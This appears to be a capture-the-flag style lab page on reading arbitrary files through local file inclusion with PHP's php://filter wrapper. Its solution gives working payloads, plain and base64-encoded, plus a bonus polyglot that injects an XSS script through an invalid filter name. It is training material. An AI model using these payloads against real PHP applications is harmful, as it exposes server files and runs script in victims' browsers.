PHP

Local file inclusion to arbitrary file read with PHP wrappers

by Brumens
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Local File Inclusion With PHP Wrappers

Preform a Local File Inclusion by taking advantage of PHP's built-in Wrappers. You can still use the standard method to read the file, but for educational purposes it is good to know that PHP supports wrappers that can be used to bypass filters and/or web application firewalls (WAF).

Hints

Hint #1
expand_more

Try use php://filter

Solution

Read the solution
expand_more

Payload :

Without base64: It will also contain PHP errors but still expose the file content.

php://filter/resource=flag.txt

Base64 output :

php://filter/convert.base64-encode/resource=flag.txt

Bonus

You can also create a polyglot payload by infecting the reflected PHP error with an XSS payload as an invalid filter. (_Click on the "eye" icon in the top right corner of the "RESULT" tab to render HTML and to see the XSS pop. _)

php://filter/<script>alert(1)<%2fscript>/resource=flag.txt
drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result